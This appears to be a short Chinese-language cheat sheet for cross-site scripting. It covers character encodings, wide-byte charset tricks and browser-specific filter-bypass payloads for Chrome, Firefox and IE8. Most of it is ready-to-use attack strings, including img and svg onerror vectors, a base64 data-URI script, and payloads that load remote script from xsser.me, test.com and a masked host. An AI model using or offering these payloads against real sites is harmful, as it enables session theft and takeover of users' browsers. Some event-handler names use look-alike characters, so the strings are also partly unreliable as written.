html特殊编码
< <
> >
" "
' '
\ \
/ /
- 先加'"></\测试看过滤情况。
innerHTML
\没有过滤
<可以表示为\u003c 或\x3c
>可以表示为\u003e 或\x3e
空格 \u0020 或 \x20
分隔符可以试试/**/
\反斜杠有时候可以转义正常语句,改变语句的执行。
如果gbxxx系列字符集可尝试宽字节
双引号表示为%c0%22
\ %c0%5c(后三位是表示字符)
前半个字符被解释错误,后半个字符解释出想要的结果;
换行符:%0a
josn:http://www.w3school.com.cn/json/json_syntax.asp
过chrome
<!--<img src="--><img src=x οnerrοr=alert(1)//">
"><svg><script xlink:href=//********></script> chrome的bypass
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click<a>
过fiefox
"><script src=http://xsser.me/*****></script>
过IE
IE8 xss filter bypass (xss过滤器绕过)
οnerrοr="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"
新标签
<isindex type=image src=1 οnerrοr=alert(1)>